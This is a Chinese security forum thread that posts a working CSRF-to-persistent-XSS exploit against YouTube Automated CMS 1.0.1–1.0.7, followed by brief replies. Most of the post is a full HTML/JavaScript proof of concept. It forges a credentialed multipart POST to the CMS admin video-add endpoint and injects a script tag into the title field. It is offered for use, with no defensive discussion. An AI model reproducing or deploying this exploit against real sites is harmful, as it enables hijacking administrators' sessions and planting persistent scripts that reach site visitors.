查看: 20893|回复: 5

YouTube 自动化CMS 1.0.7两处XSS

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2016-10-19 16:14:15 | 显示全部楼层 |阅读模式
    演示视频:https://youtu.be/cCtThSquNSk

    CSRF to 持续性 XSS
    Version: 1.0.1 to 1.0.7

    CSRF Exploit Code:
    [HTML] 纯文本查看 复制代码
    <html>
      <body>
       <title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
            xhr.withCredentials = true;
            var body = "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"title\"\r\n" + 
              "\r\n" + 
              "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"details\"\r\n" + 
              "\r\n" + 
              "\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"category_id\"\r\n" + 
              "\r\n" + 
              "1\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" + 
              "Content-Type: application/octet-stream\r\n" + 
              "\r\n" + 
              "\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"published\"\r\n" + 
              "\r\n" + 
              "1\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"duration\"\r\n" + 
              "\r\n" + 
              "70\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"image\"\r\n" + 
              "\r\n" + 
              "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" + 
              "-----------------------------1681718590736\r\n" + 
              "Content-Disposition: form-data; name=\"submit\"\r\n" + 
              "\r\n" + 
              "\r\n" + 
              "-----------------------------1681718590736--\r\n";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
          }
        </script>
        <br><br><br>
        <center>
        <h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
        <form action="#">
          <input type="button" value="Submit request" onclick="submitRequest();" />
        </form>
      </center>
      </body>
    </html>


    相关帖子

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2021-1-25 21:16
  • 签到天数: 419 天

    [LV.9]以坛为家II

    发表于 2016-10-19 17:36:27 | 显示全部楼层
    谢谢分享
    回复

    使用道具 举报

    该用户从未签到

    发表于 2016-10-19 18:06:21 | 显示全部楼层
    APP回复测试
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2024-1-11 16:11
  • 签到天数: 426 天

    [LV.9]以坛为家II

    发表于 2016-10-19 18:07:14 | 显示全部楼层
    test?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2022-11-4 00:00
  • 签到天数: 325 天

    [LV.8]以坛为家I

    发表于 2016-10-19 18:18:06 | 显示全部楼层

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-2-13 01:04
  • 签到天数: 306 天

    [LV.8]以坛为家I

    发表于 2016-10-20 17:15:39 | 显示全部楼层
    我他妈一直新手上路
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 13:30 , Processed in 0.026186 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部